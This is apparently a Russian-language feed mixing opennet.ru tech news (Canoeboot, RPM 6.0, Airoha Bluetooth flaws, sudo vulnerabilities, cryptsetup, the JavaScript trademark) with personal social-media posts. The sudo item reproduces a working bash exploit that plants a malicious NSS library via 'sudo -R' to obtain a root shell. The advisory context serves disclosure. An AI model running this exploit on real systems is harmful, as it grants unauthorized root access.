  • HP Compaq Elite 8300 CMT;
  • HP EliteBook 8460p;
  • HP EliteBook 8560w;
  • Dell Latitute E6400 / E6430;
  • Dell Latitude E5420 / E5520 / E5530 / E6520 / E6530 / E6420 / E6220 / E6320 / E6330 / E6230 / E4300;
  • Apple MacBook1 и MacBook2;
  • ASUS Chromebook Flip C101 (ARM);
  • Samsung Chromebook Plus (ARM).
• Игровые приставки:
  • Sony PlayStation 1.

Также сформирован выпуск проекта Canoeboot 25.06, который позиционируется как полностью свободная сборка Libreboot, соответствующая требованиям Фонда СПО к свободным дистрибутивам. Выпуск Canoeboot основан на версии Libreboot 25.06, из которой удалены компоненты и изменения, не соответствующие критериям Фонда СПО.

Необходимость в создании отдельной сборки Libreboot объясняется тем, что сформированные Фондом СПО требования к свободным дистрибутивам не допускают поставку бинарных прошивок (firmware) и любых бинарных компонентов драйверов. При этом начиная с 2022 года проект Libreboot перешёл на более прагматичные правила использования бинарных компонентов, позволившие заметно расширить спектр поддерживаемого аппаратного обеспечения. Новой целью проекта Libreboot стала поддержка всего оборудования, поддерживаемого в coreboot, за исключением бинарных компонентов, влияющих на безопасность и надёжность (например, в Libreboot используется me_cleaner для отключения Intel ME). При таком подходе Libreboot потерял статус полностью свободного дистрибутива с позиции Фонда Свободного ПО.

В новой версии Canoeboot реализована поддержка:

• материнской платы Acer Q45T-AM
• ПК Dell Precision T1650
• ПК Dell OptiPlex 7010 SFF, 9020 SFF, 9020 MT
• ПК HP Elite 8200 SFF, 8300 CMT, 8300 USDT,
• ноутбуков Dell Latitude E5420, E5520, E5530, E6220, E6230, E6320, E6330, E6420, E6430, E6520, E6530
• ноутбуков Lenovo ThinkPad T420, T420s, T430, T440p, T520, T530, W530, W541, X220, X230 и X230T

Устройства, поддерживаемые в Canoeboot:

• Игровые консоли:
  • Sony Playstation (PS1/PSX)
• Серверные материнские платы:
  • ASUS KFSN4-DRE motherboard
  • ASUS KGPE-D16 motherboard
• Десктоп-системы:
  • Acer G43T-AM3
  • Apple iMac 5,2
  • ASUS KCMA-D8
  • Gigabyte GA-G41M-ES2L
  • Intel D510MO and D410PT motherboards
  • Intel D945GCLF
  • Dell Precision T1650
  • Dell OptiPlex 780, 7010 SFF, 9020 SFF и 9020 MT
  • HP Elite 8200 SFF, 8300 CMT и 8300 USDT
• Ноутбуки (x86):
  • Apple MacBook1,1 и MacBook2,1
  • Dell Latitude E4300, E6400, E6400 XFR, E6400 ATG, E5420, E5520, E5530, E6220, E6230, E6320, E6330, E6420, E6430, E6520 и E6530
  • Lenovo ThinkPad R500, T400, T400S, T500, W500, X200, X200S, X200 Tablet, T60, X60, X60S, X60 Tablet (Intel GPU), T420, T420s, T430, T440p, T520, T530, W530, W541, X220, X230 и X230T
• Ноутбуки (ARM):
  • ASUS Chromebook Flip C101
  • Samsung Chromebook Plus (v1)
• Эмуляторы:
  • QEMU x86 и arm64

Я тут понял, что "тик-ток" (или любой другой сервис коротких видео, где ты смотришь бесконечную ленту, сформированную "для тебя") это, буквально, новый телевизор.

Я утром краем уха я зацепил разговор двух детей-подростков:
- Мне, кстати, сегодня наконец-то попалось в "тик-токе" <хайповая_тема>

И меня одёрнуло от воспоминания, что мы так же в нашем детстве говорили про телевизор:

• - Мне сегодня по телевизору наконец-то попалась та самая серия мультфильма
• - Я вчера включил телевизор на начальных титрах того самого фильма и посмотрел его

То есть всё возвращается на круги своя: не хочется собирать или искать себе контент самостоятельно, пусть телевизор работает себе в углу постоянно, должны же там наконец-то показать что-то стоящее!

Бегуны — малоизвестная секта, существовавшая до середины XIX века, когда против них провели репрессивную кампанию. Бегуны считали, что Российская империя — государство антихриста, а потому категорически нельзя иметь с ним никаких дел. Например, нельзя платить подушную подать и молиться за царя. Единственным допустимым для них образом жизни было бродяжничество.
https://vatnikstan.ru/history/beguni/

Бета-выпуск пакетного менеджера RPM 6.0

Основные изменения в RPM 6.0:

• Поддержка нового формата пакетов RPM 6, позволяющего создавать пакеты размером более 4 ГБ. В формате RPM 6 задействованы 64-разрядные поля с размерами, модернизированы структуры, связанные с криптографией, и добавлены MIME-сведения о файлах.
• Прекращена поддержка формата RPM 3. Поддержка формата RPM 4, использующего cpio, будет сохранена в полном объёме - дистрибутивы на своё усмотрение смогут остаться на формате RPM 4.
• По умолчанию включены проверки подлинности пакетов с использованием цифровой подписи.
• В утилиту rpmbuild добавлена поддержка автоматического формирования локальных подписей во время сборки, а в утилиту rpm добавлена опция "--nosignature" для принудительной установки пакета без проверки подписи.
• Предоставлена возможность использования вместо GnuPG инструментария Sequoia-sq, написанного на Rust.
• В разработке разрешено использование языка C++ (C++20), а не только языка Си.
• Реализована возможность использования нескольких подписей OpenPGP для каждого пакета.
• Прекращена поддержка хэшей MD5, SHA1 и DSA.
• Расширены возможности утилиты rpmkeys по работе с ключами, например, для обновления OpenPGP-ключей можно использовать команду "rpmkeys --import".
• Задействованы только полные идентификаторы и хеш-отпечатки (fingerprint) ключей OpenPGP.
• Добавлена возможность обновления уже импортированных ключей.
• В обвязках для языка Python реализована поддержка изоляции состояния Python-модулей для их запуска в нескольких субинтерпретаторах.

Атака через Bluetooth-наушники Sony, Marshall и Beyerdynamic на чипах Airoha

Выявившие уязвимость исследователи смогли подготовить прототип инструментария, позволяющего удалённо по Bluetooth читать и записывать данные в оперативную память и Flash. На практике, получения полного доступа к памяти наушников может использоваться для атаки на сопряжённый с наушниками смартфон пользователя. В частности, упоминается, что через взаимодействие наушников со смартфоном можно получить доступ к содержимому адресной книги, извлечь историю звонков, совершать звонки и прослушивать разговоры или улавливаемые микрофоном звуки.

Для взаимодействия со смартфоном со скомпрометированных наушников используются возможности Bluetooth-профиля HFP (Hands-Free Profile), позволяющего отправлять команды на смартфон. Из-за сложности эксплуатации уязвимостей можно предположить, что проблемы будут востребованы для проведения целевых атак на конкретных персон, а не на массовое применение против обычных пользователей. Проблема в том,что инструментарий для проведения атаки должен быть реализован для каждой отдельной модели наушников, так как необходимо учитывать различия раскладки памяти в каждой прошивке.

Проведение атаки возможно благодаря выявлению трёх уязвимостей в Blutooth-стеке Airoha. Уязвимости CVE-2025-20700 и CVE-2025-20701 позволяют установить канал связи с Bluetooth BR/EDR (Bluetooth Classic) и сервисами GATT (Bluetooth Low Energy) без прохождения аутентификации, а уязвимость CVE-2025-20702 позволяет задействовать специфичный для SoC Airoha расширенный протокол для манипуляции устройством. Исследователи выявили, что служебный расширенный протокол, среди прочего позволяющий читать и записывать данные в ОЗУ и Flash, доступен без сопряжения устройств через BLE GATT или Bluetooth Classic RFCOMM.

Информация о наличии уязвимостей была отправлена в компанию Airoha 25 марта, но ответ удалось получить только 27 мая после нескольких повторных попыток связаться с Airoha и привлечения к этому некоторых производителей устройств. 4 июня компания Airoha начала распространение среди производителей обновлённого SDK, включающего возможности для блокирования уязвимостей. В конце июня после истечения 90 дней с момента отправки информации о проблеме исследователи опубликовали общие сведения об уязвимостях, но решили пока не раскрывать детали, касающиеся проблемного протокола, чтобы дать производителям дополнительное время на распространение обновлений прошивок.

Устройства, в которых подтверждено наличие рассматриваемых уязвимостей:

• Beyerdynamic Amiron 300;
• Bose QuietComfort Earbuds;
• EarisMax Bluetooth Auracast Sender;
• Jabra Elite 8 Active;
• JBL Endurance Race 2, JBL Live Buds 3;
• Jlab Epic Air Sport ANC;
• Marshall ACTON III, MAJOR V, MINOR IV, MOTIF II, STANMORE III, WOBURN III;
• MoerLabs EchoBeatz;
• Sony CH-720N, Link Buds S, ULT Wear, WF-1000XM3/4/5, WF-C500, WF-C510-GFP, WH-1000XM4/5/6, WH-CH520, WH-XB910N, WI-C100;
• Teufel Tatws2.

#словотворчество
жруналист
ржуналист

Третий предварительный выпуск мессенджера Pidgin 3.0

Ветка Pidgin 3 разрабатывается с 2011 года, а до этого ещё три года обсуждалась на уровне концепций и идей. В Pidgin 3 выполнен переход на систему типов GObject, библиотеки GTK4 и Adwaita, сборочную систему Meson, GPlugin для обработки плагинов, SQLite для хранение истории чатов и GSettings для работы с настройками. Полностью переработан API. Для определения элементов интерфейса задействован GTK Builder XML, а для отображения истории чатов создана собственная библиотека виджетов Talkatu.

В интерфейсе объединены в одном окне список контактов и чат. Прекращена поставка консольного клиента Finch (не исключено, что его могут вернуть в будущем). Из протоколов пока поддерживается только IRCv3, а также развиваются новые реализации протоколов XMPP, SIP и Bonjour, которые пока поддерживаются частично. Ветка Pidgin 3 несовместима с Pidgin 2 и ранее созданными плагинами, но может быть установлена параллельно с имеющимися сборками Pidgin 2.

Наиболее заметным улучшением в новой версии стало добавление в конфигуратор секций Appearance, Privacy и Development. В секции Appearance предложена опция для показа элементов форматирования сообщений. В секции Privacy можно отключить отправку данных для индикации набора текста. В секции Development предоставлена возможность активации режима для разработчиков, упрощающего отладку плагинов и предоставляющего доступ к ещё находящимся в разработке возможностям, таким как поддержка протоколов Bonjour и XMPP.

Уязвимости в утилите sudo, позволяющие получить права root в системе

Уязвимость проявляется в конфигурации по умолчанию и подтверждена в выпусках sudo с 1.9.14 по 1.9.17 (потенциально затрагивает все версии, начиная с 1.8.33). Проблема устранена в обновлении sudo 1.9.17p1. Проверить состояние новой версии пакета или подготовки исправления в дистрибутивах можно на следующих страницах (если страница недоступна, значит разработчики дистрибутива ещё не приступили к рассмотрению проблемы): Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo и Arch (1, 2).

Проблема вызвана тем, что при применении опции "-R" ("--chroot") для запуска команд в chroot-окружении с выбранным пользователем корневым каталогом, файл /etc/nsswitch.conf загружался в контексте нового корневого каталога, а не системного каталога. Так как пользователь может использовать в качестве корневого каталога для chroot собственный каталог, он может разместить в нём файл конфигурации nsswitch.conf. Контролируя загружаемый подсистемой NSS (Name Service Switch) файл /etc/nsswitch.conf, пользователь может добавить в него настройки, приводящие к вызову дополнительных обработчиков. Подобные обработчики загружаются NSS в форме разделяемых библиотек, которые также можно разместить в подконтрольном пользователю каталоге. Подставив свою библиотеку пользователь может добиться выполнения из неё кода с правами root, так как обработка NSS производится до сброса привилегий.

Пример эксплоита:

#!/bin/bash

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c‹EOF
#include 
#include 

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

В версии sudo 1.9.17p1 также устранена ещё одна уязвимость (CVE-2025-32462), позволяющая выполнить команды с правами root, но проявляющаяся только в конфигурациях sudoers, параметр "host" в которых выставлен в значение, отличное от ALL или имени текущего хоста. Уязвимость вызвана ошибкой, из-за которой опция "-h" ("--host") действовала не только в сочетании с опцией "-l" ("--list") для вывода привязанных к хосту привилегий, но и при запуске команд. Таким образом пользователь мог указать при вызове sudo любой хост и обойти ограничения правил sudoers, привязанных к имени хоста.

Для совершения атаки пользователь должен упоминаться в sudoers, например, если в настройках указано "testuser testhost = ALL", то пользователь "testuser" мог указать "sudo -h testhost" и запустить команды с правами root на любых хостах, а не только на хосте testhost. Уязвимости не подвержены конфигурации с настройками вида "testuser ALL = ALL" или без явных правил для конкретного пользователя.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63505

Новое приобретение.
К слову, увидел, что начали «ремонт» (обычно дешёвая и травмирующая старые здания перекраска фасада) дома с Башней Вяч. Иванова, где на крыше сделана самая инфернальная фотография Кузмина. Печаль, конечно, испортят. Он сохранялся неизменным, кажется, с тех самых времён.

#ЛенинградНутряной #чтопочитать

Верëвка, пуля, ледяная тьма
И музыка, сводящая с ума.
Верёвка, пуля, каторжный рассвет
Над тем, чему названья в мире нет.

Обновление Steam Client для Linux с включением по умолчанию Proton для запуска Windows-игр

Из общих улучшений отмечается сокращение времени запуска Steam Client для игроков с очень большим числом игр, добавленных не через Steam. Реализована система отслеживания производительности игр, выводимая поверх экрана (In-Game Overlay) и показывающая детальную информацию о частоте кадров, потреблении ресурсов CPU и производительности GPU. В данном выпуске режим мониторинга доступен только для Windows, а для Linux его обещают включить в одном из следующих обновлений.

Одновременно опубликовано обновление операционной системы SteamOS 3.7.13, основанной на Arch Linux. В новой версии помимо исправлений ошибок, таких как регрессии в работе Wi-Fi на Steam Deck OLED, реализована поддержка кнопок питания для платформ AYANEO, AYN, GPD, MSI, ONEXPLAYER и OrangePi. Для разработчиков в udisk добавлены модули btrfs и lvm2.

Число игр для Linux, доступных в каталоге Steam, доведено до 16139. По данным сервиса Steam Database, пользователи Linux запускают 4025 игр через Steam. Пятёрка игр, наиболее популярных у пользователей Linux: Counter-Strike 2, Dota 2, Banana, Stardew Valley, Team Fortress 2.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63504

Выпуск Phosh 0.48.0, GNOME-окружения для смартфонов

Среди изменений:

• Добавлен новый плагин для хранителя экрана, позволяющий управлять воспроизведением в мультимедийных проигрывателях, используя протокол MPRIS.
• Предоставлена возможность написания плагинов на языке Vala.
• Включён по умолчанию показ диалога Cell Broadcast с широковещательными сообщениями от сотового оператора.
• В конфигуратор phosh-mobile-settings добавлена панель для настройки категорий принимаемых широковещательных сообщений от сотовых операторов. Добавлена поддержка настройки категорий показываемых системных уведомлений. Добавлена опция для управления показом индикатора клавиатуры в экранной панели.
• В композитном сервере Phoc задействованы библиотеки wlroots 0.19.0 и добавлена поддержка Wayland-протоколов shortcuts-inhibit (назначение клавиатурных комбинаций), ext-image-capture-source-v1 и ext-image-capture-copy-v1 (захват контента, выводимого на экран). Улучшена поддержка протокола wp_presentation_time_v2. Реализована поддержка адаптивного изменения частоты обновления монитора (adapative-sync). Обеспечено сохранение и восстановление настроек вывода на экран.
• В gmobile, набор обработчиков для работы GNOME на мобильных устройствах, для смартфонов Fairphone 5 и FuriPhone FLX1 реализована поддержка кнопки выхода из ждущего режима. Обеспечено преобразование кодов стран из представления MCC в ISO.
• Экранная клавиатура phosh-osk-stub переименована в Stevia. Добавлена раскладка клавиатуры "us+dvorak".
• Обновлены версии зависимостей: wlroots 0.19.0, GNOME 48, Calls 48.2, cellbroadcastd 0.0.2, feedbackd 0.8.3, feedbackd-device-themes 0.8.4 и callaudiod 0.1.10.

Не хочу, чтобы открывался какой-нибудь «кинопоиск» или «рувики» вместо википедии, а иногда не глядя тыкаю.

И что, теперь вводить миницензуру и чёрный лист самостоятельно?
Не уверен, насколько это хороший симметричный ответ...

#цензура

@limprog
1. Обнаруживаю опустошение, или любое другое чувство;
2. Осознаю что есть чувство - объект, и есть то что осознаёт это чувство - субъект. Это две независимые вещи, не "я опустошён", а опустошение присутствует, и я имею возможность его осознавать.
3. Фокусирую всё своё внимание на чувстве;
4. Локализую чувство в пространстве, где оно есть, в теле или вне его, в какой части тела;
5. Прошу своё бессознательное вести меня к решению, без конкретики;
6. Продолжаю погружаться, ощупывая вниманием пространство внутри и вокруг этого чувства и позволяя, тому что есть, меняться и перемещаться.

Как правило для меня этого бывает достаточно, но если нет – добавляю техники типа "символического моделирования" и/или "активного воображения", чтоб ещё усилить чувства за счёт образов и/или обнаружить историю за этим чувством.

Вот отец удивится, почему так повысилась коммуналка (до этого он думал, что газпр*м должен снизить цены на газ, раз они потеряли западный рынок; и не верил, что связь отключили из-за «экономического форума»).

#пропаганда

Интересно и жутко наблюдать, как считающий себя самым умным человек попадает в капкан беспардонной пропаганды, уверенный в том, что сможет разобраться, где в телевизоре привирают (проблема в том, что в телевизере нет правды вообще: все достижения вымышлены, все факты искажены и перевёрнуты).

Выпуск дистрибутива Альт Образование 11.0

"Альт Образование" позволяет создавать и интегрировать рабочие места для учеников, студентов, преподавателей. Необходимый комплект программ можно выбрать на этапе установки ОС либо скачать в любое время из специального мета-пакета. Дистрибутив обеспечивает централизованное управление учебным классом, автоматизированную одновременную установку на несколько рабочих мест, поддерживает гостевые сеансы, может работать в гетерогенной сети, совместим с образовательными веб-сервисами и отечественным ПО, работает с интерактивными досками. В процессе установки системы пользователи могут выбрать графическую среду Xfce или KDE Plasma.

Основные изменения по сравнению с прошлой веткой:

• Обновлены версии пакетов, например, Xfce 4.20.1, KDE Plasma 6.3, ядро Linux 6.12, Perl 5.38.4, Python 3.12.7/2.7.18, PHP 8.3.19, GCC 13.2.1, LibreOffice 24.8.5.2, Chromium 136.0.7103.113, Wine 9.0.14, GIMP 3.0.2, wxMaxima 24.05.0, Scribus 1.7.0, Inkscape 1.4, Blender 4.3.0, Moodle 4.5, Lazarus 4.0, QGIS 3.42, Python IDLE 3.12.
• Прекращено формирование образов для 32-битных архитектур.
• Вместо Xfce по умолчанию предложена среда рабочего стола KDE Plasma 6 на базе Wayland. Xfce доступен как опция.
• Добавлено приложение "Альт Центр" (altcenter) для просмотра информации о системе, настройки, установки и удаления компонентов. Связанные с настройкой возможности вынесены из инсталлятора в altcenter.
• В инсталляторе предоставлена возможность настройки сети на стадии до начала установки пакетов.
• Из дистрибутива удалены средства организации видеоконференцсвязи, itest, scilab и monodevelop.

Каждый раз когда оказываюсь в здешних местах— любуюсь этой липой. Она какой-то удивительно правильной формы, как будто её регулярно подстригают. Она и без листьев хороша, а сейчас ну просто прекрасна.

Каждый раз когда оказываюсь в здешних местах— любуюсь этой липой. Она какой-то удивительно правильной формы, как будто её регулярно подстригают. Она и без листьев хороша, а сейчас ну просто прекрасна.

@vikingkong Ну, как бы Интернет это не какое-то одно место, а совокупность их. Всегда можно сидеть в своём Интернете и в хомячковый не ходить :)

А так - это всё равно спрос-предложение. Просто так силы мало кто будет тратить, даже на написание мануалов для чайников, да и не заметят их. Если же прижмёт - то заметят. Вот, с Ютубом, а до того со всякими Инстами прижали. Ну что-ж, получили деградацию сети в принципе. Посмотрим, сколько ушей назло мамке ещё отморозят, там вон даже до китайцев дошло, что слишком закрученные краны мешают торговать с лаоваями и вообще жыть, но нам ни Запад не указ, ни Восток, ни здравый смысл. Как говорится, цели нет, есть путь.

@rf @evgeny_afanasev @rubikoid @hardworm @kurator88

Звучит сложно, но на самом деле все просто, ибо анархичен каждый — как раз это и является в нем нормальным. Анархичность, правда, с первого же дня ограничивается отцом и матерью, государством и обществом. Стихийную силу урезают и отнимают, такого не избежать никому. Нужно смириться с этим. Однако анархическое остается на дне как тайна, чаще всего не осознаваемая и самим носителем. Оно может вырваться из человека как лава, может его уничтожить, может освободить.
Здесь следует различать: любовь анархична, брак — нет. Воин анархичен, солдат — нет. Смертельный удар анархичен, убийство — нет. Христос анархичен, Павел — нет. Но, поскольку анархическое является нормальным состоянием, оно наличествует и в Павле тоже — и иногда мощно вырывается из него. Речь идет не о противоположностях, а о стадиях. Всемирная история движется анархией. Короче говоря: свободный человек анархичен, анархист — нет.

#цитаты #Юнгер

Звучит сложно, но на самом деле все просто, ибо анархичен каждый — как раз это и является в нем нормальным. Анархичность, правда, с первого же дня ограничивается отцом и матерью, государством и обществом. Стихийную силу урезают и отнимают, такого не избежать никому. Нужно смириться с этим. Однако анархическое остается на дне как тайна, чаще всего не осознаваемая и самим носителем. Оно может вырваться из человека как лава, может его уничтожить, может освободить.
Здесь следует различать: любовь анархична, брак — нет. Воин анархичен, солдат — нет. Смертельный удар анархичен, убийство — нет. Христос анархичен, Павел — нет. Но, поскольку анархическое является нормальным состоянием, оно наличествует и в Павле тоже — и иногда мощно вырывается из него. Речь идет не о противоположностях, а о стадиях. Всемирная история движется анархией. Короче говоря: свободный человек анархичен, анархист — нет.

#цитаты #Юнгер

@hardworm Ты как-то поверхностно смотришь на проблему. Малину обосрали люди, что начали в принципе ходить какой-то там зарубежный интернет (ну и Интернет вообще). Сидели бы на одном Рамблере и ничего бы не было.

@rf @evgeny_afanasev @rubikoid @kurator88

Посвящается Дэвиду Грэберу,
чье наследие будет жить вечно

Кори Доктороу, "Гиблое дело"

Такое посвящение, как по мне, делает больше для восприятия содержимого, чем аннотация и цитаты на обложке.

(#федичитает #чтопочитать)

Борода Лешего

#fedimoss

Ubuntu будет поставлять intel-compute-runtime без защиты от Spectre, снижающей производительность на 20%

Пакет intel-compute-runtime включает компоненты, необходимые для использования OpenCL и OneAPI Level Zero на системах с GPU Intel. При сборке поставляемых в пакете библиотек наличие сборочного флага NEO_DISABLE_MITIGATIONS приводит отключению в компиляторе опций "-mretpoline -mindirect-branch=thunk -mfunction-return=thunk -mindirect-branch-register", обеспечивающих дополнительную защиту от Spectre. На производительность OpenCL и операций на стороне GPU эти опции не влияют, но снижают накладные расходы при выполнении кода, отвечающего за работу API.

Инженеры, отвечающие за безопасность в Intel и Canonacal, в ходе обсуждения пришли к выводу, что в защите от Spectre, реализованной на уровне Compute Runtime, больше нет необходимости, так как необходимая защита уже имеется на уровне ядра. Имеющаяся в Compute Runtime защита от Spectre представляет интерес в основном для тех, кто использует ядра без должной защиты, и польза от неё не перекрывает наблюдаемое снижение производительности. Кроме того, предоставляемые Intel релизы Intel Graphics Compute Runtime собираются с выставлением по умолчанию флага NEO_DISABLE_MITIGATIONS, отключающего защиту.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63498

Борода Лешего

#fedimoss

Multiprocessor Support for mvme88k: Interview with Miod Vallat, undeadly.org in 2007.

OpenBSD had a fledging 2000s port to Motorola 88000-based VME computers, for which Miod implemented SMP.

> Is there anything interestingly unique or different about mvme88k from other architectures?

"Well, yes and no."

> What do you use the architecture for?

"I keep telling people the main reason is for heating purpose, but this joke is really getting old."

Worth reading in full:
https://undeadly.org/cgi?action=article;sid=20071111153236

Доступен Cryptsetup 2.8 с поддержкой inline-режима хранения метаданных

Ключевые улучшения:

• Добавлена поддержка inline-режима, позволяющего использовать расширенные секторы с дополнительной областью для хранения метаданных. Подобные секторы поддерживаются некоторыми NVMe-накопителями, позволяющими помимо области с данными размещать в секторе и блок метаданных (например, 4096 байт под данные + 64 байт под метаданные).

  Cryptsetup может использовать область метаданных в секторе для хранения служебной информации, что избавляет от необходимости задействования дополнительного слоя на базе dm-integrity, отвечающего за выделение места под метаданные. Соответственно, можно обойтись без ведения журнала dm-integrity, являющегося узким местом, негативно влияющим на производительность. В ядре Linux возможности, необходимые для работы inline-режима, присутствуют начиная с выпуска 6.11. Для включения inline-режима добавлена опция "--integrity-inline".

• Доведён до готовности API Keyslot Context для манипуляции со слотами ключей. Новый API позволил расширить функциональность многих существующих команд, такими функциями, как активация токенов, возобновления работы с приостановленным зашифрованным устройством и выполнение повторного шифрования (reencryption).
• В утилиту cryptsetup добавлены опции "--key-description" и "--new-key-description" для прикрепления описания к ключам.
• Добавлена возможность возобновления приостановленной операции повторного шифрования (reencryption), используя токен и ключи раздела.
• В реализацию команды "repair" добавлена проверка повреждения областей со слотами ключей LUKS.
• В команду veritysetup добавлена опция "--error-as-corruption" при которой любые ошибки обрабатываются как повреждение данных, соответственно можно настроить перезагрузку или переход в состояние panic при ошибках, в случае использования опций "--restart-on-corruption" и "--panic-on-corruption".
• Добавлена опциональная возможность использования библиотеки Mbed-TLS в качестве крипто-бэкенда (включается при сборке с опцией "--with-crypto_backend=mbedtls").

Выпуск Hangover 10.11, пакета для запуска Windows-приложений на системах ARM64

Hangover заметно обгоняет по производительности конфигурации, в которых Wine запускается целиком в режиме эмуляции, так как при использовании Hangover эмулятор применяется только для выполнения кода самого приложения, а все системные вызовы, библиотеки и компоненты Wine выполняются вне эмулятора в родном для текущей платформы исполнении (Hangover разрывает цепочку эмуляции на уровне обращений к win32 и wine). В слое эмуляции могут использоваться FEX и Box64, в зависимости от предпочтений пользователя. Начата, но пока не завершена работа по поддержке эмулятора Blink.

Среди изменений в версии 10.11:

• Прекращена поддержка использования QEMU в слое эмуляции. Вместо трёх систем эмуляции в проекте оставлены только две - FEX и Box64.
• Выполнена синхронизация с кодовой базы Wine 10.11.
• Состояние эмулятора Box64 обновлено до актуальной кодовой базы из Git.

Автор Node.js добивается отмены торговой марки JavaScript

Компания Oracle никак не отреагировала на призыв и Райан попытался добиться отмены торговой марки в Агентстве по патентам и товарным знакам США (USPTO). В Апелляционный совет по товарным знакам (TTAB) было направлено ходатайство об отмене торговой марки, в котором были указаны три претензии: введение в заблуждение при продлении торговой марки, использование торговой марки на термин общего назначение и неиспользование торговой марки в продуктах её владельца.

Несколько дней назад Апелляционный совет отклонил первую претензию, суть которой в том, что во время продления своих прав на торговую марку "JavaScript" в 2019 году компания Oracle ввела USPTO в заблуждение и указала сведения не соответствующие действительности. В качестве демонстрации своих продуктов, использующих торговую марку "JavaScript", компания Oracle привела скриншот с сайта платформы Node.js, которая никак не связана c Oracle и никогда не была её продуктом. Райан не согласен с данным решением, но не намерен тратить ресурсы на его оспаривание, так как это лишь затянет разбирательство на месяцы.

Решено сосредоточить усилия на оставшихся двух претензиях - общем характере термина "JavaScript" и неиспользовании торговой марки в продуктах Oracle:

• Слово "JavaScript" повсеместно используется для описания языка программирования, определяемого спецификацией ECMA-262, а не бренда или продукта компании Oracle, которая никак не связана с эволюцией языка JavaScript. Термин JavaScript используется миллионами разработчиков по всему миру, независимо от Oracle. Компания Oracle никогда не контролировала процесс разработки спецификации или использование языка. В соответствии с действующим в США законодательством, слова, ставшие общими терминами, не могут оставаться торговыми марками.
• Торговая марка "JavaScript" досталась компании Oracle вместе с активами Sun Microsystems и на практике напрямую не ассоциируется ни с одним из продуктов Oracle. Язык JavaScript стандартизирован ассоциацией Ecma, управляется рабочей группой TC39 и реализуется такими компаниями, как Apple, Google и Mozilla. Законодательство США считает заброшенными (abandoned) торговые марки, неиспользуемые в течение трёх лет.

До 7 августа представители Oracle должны предоставить в USPTO ответы на все пункты, указанные в ходатайстве об отмене торговой марки. После этого 6 сентября в USPTO начнётся разбирательство. Более 20 тысяч разработчиков подписали петицию о том, что торговая марка "JavaScript" не служит общественным интересам и мешает отрасли.

Отмечается, что наличие действующей торговой марки вынуждает компании, развивающие продукты, связанные с языком JavaScript, действовать в серой зоне, используя данное название постольку, поскольку компания Oracle пока не заявляет никаких требований. Например, из-за опасений возможных претензий со стороны Oracle так и не была создана "Конференция JavaScript". Предполагается, что Oracle удерживает торговую марку, которую не использует, для сохранения влияния на экосистему, в которой больше не участвует.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63494

Товарищ предположил, что никаких выпускников вчера на Алых парусах вообще не было, а картинку нарисовал "ИИ". Я стал спорить, потому что видел не одну компанию выпускников, которые туда собирались. Важно всё-таки личное свидетельство - и плевать, что это могли быть актёры.

Дистрибутив Artix Linux начал поставку сборок с XLibre, форком X.Org Server

Места, искалеченные упырями – мусорные полигоны, прихваченные недостреленными братками земли, вырубленные леса, изуродованные деревья, намеренно заваленные чтобы не пройти и не проехать, калечные дороги, вырытые пластами кладбища.
Есть в этих локациях что-то неземное и притягательное, как будто путники могут встретить там нечто потустороннее, потревоженное и разозлённое человеками.
Там я часто вспоминаю рассказ The Tree on the Hill.

#ЛенинградНутряной

Опубликован Wayback, композитный сервер Wayland для запуска рабочих столов на базе X11

Проект предоставляет композитный сервер Wayland, ограниченный возможностью запуска полноэкранного сеанса X11 при помощи Xwayland. Wayback развивается для упрощения ухода от поставки классического X.org Server в дистрибутиве Alpine. Предполагается, что оставление в дистрибутиве только компонентов, необходимых для Wayland и Xwayland, сократят затраты на сопровождение X11-приложений в Alpine.

Wayback использует библиотеку wlroots от проекта Sway, в которой реализованы базовые примитивы для построения композитных серверов на базе Wayland. Код Wayback основан на tinywl, эталонном композитном сервере от разработчиков wlroots, функциональность которого была урезана до минимума, достаточного для обособленного запуска Xwayland.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63491

I think that if you are a forager, you have a reciprocal obligation to expand the populations of the plants/ fungi you are foraging for.

В #спб книжный магазин "Все свободны" (Некрасова 23) организовал сбор на ремонт окон и летнюю террасу.

В связи с последними новостями из мира независимых книжных, хочется искренне пожелать им успехов 🤝

@pxlzm Забулдыга